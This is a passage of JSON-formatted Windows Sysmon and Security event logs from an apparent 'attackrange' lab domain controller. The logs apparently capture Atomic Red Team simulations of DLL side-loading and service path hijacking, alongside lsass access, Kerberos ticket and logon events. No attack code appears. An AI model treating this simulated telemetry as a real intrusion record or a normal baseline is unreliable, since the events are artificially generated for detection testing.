C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\GUP.exe\r\nCreationUtcTime: 2020-08-01 07:59:07.830","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:07.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\GUP.exe","CreationUtcTime":"2020-08-01 07:59:07.830","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4805,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.846\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\libcurl.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.846","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.846","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\libcurl.dll","CreationUtcTime":"2020-08-01 07:59:07.846","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4806,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:07.861\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.009\\bin\\WindowsServiceExample.exe\r\nCreationUtcTime: 2020-08-01 07:59:07.861","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:07.861","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.009\\bin\\WindowsServiceExample.exe","CreationUtcTime":"2020-08-01 07:59:07.861","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4807,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:08.893\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:08.893","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220521,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C7C4\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c7c4","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220522,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DE44\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6de44","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220523,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6E8FA\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6e8fa","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220524,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220525,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BFDF9658-8D50-19B9-4D46-B29268D286D5}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BFDF9658-8D50-19B9-4D46-B29268D286D5}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220526,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BFDF9658-8D50-19B9-4D46-B29268D286D5}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BFDF9658-8D50-19B9-4D46-B29268D286D5}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220527,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79F88\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BFDF9658-8D50-19B9-4D46-B29268D286D5}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x79f88","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{BFDF9658-8D50-19B9-4D46-B29268D286D5}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220528,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79F88\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x79f88","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4808,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:08.893\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:08.893","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4809,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:08.893\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 